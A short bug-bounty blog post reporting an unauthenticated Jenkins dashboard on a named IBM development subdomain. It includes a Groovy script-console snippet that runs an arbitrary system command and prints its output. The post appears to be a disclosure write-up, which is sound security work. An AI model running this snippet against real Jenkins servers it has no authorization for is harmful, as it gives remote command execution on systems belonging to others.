DEV Community

loading...
Cover image for Remote Code Execution on ibm.com subdomain

Remote Code Execution on ibm.com subdomain

Khaled Nassar
Web Developer | Part Time Bug Bounty Hunter- I use VIM btw -
・1 min read

i've found Jenkins on acc11-blr-dev-01.sl1694431.sl.edst.ibm.com does not require authentication for access dashboard

what can i do with this .?


everything , add/delete admin accounts,service,configuration,etc ..

but the intersing path is /script , you can write Jenkins script
so you can write script for execute system commands

def command = "YOUR_COMMAND"
def proc = command.execute()
proc.waitFor()
println "Process exit code: ${proc.exitValue()}"
println "Std Err: ${proc.err.text}"
println "Std Out: ${proc.in.text}"
Enter fullscreen mode Exit fullscreen mode

Thanks

Discussion (0)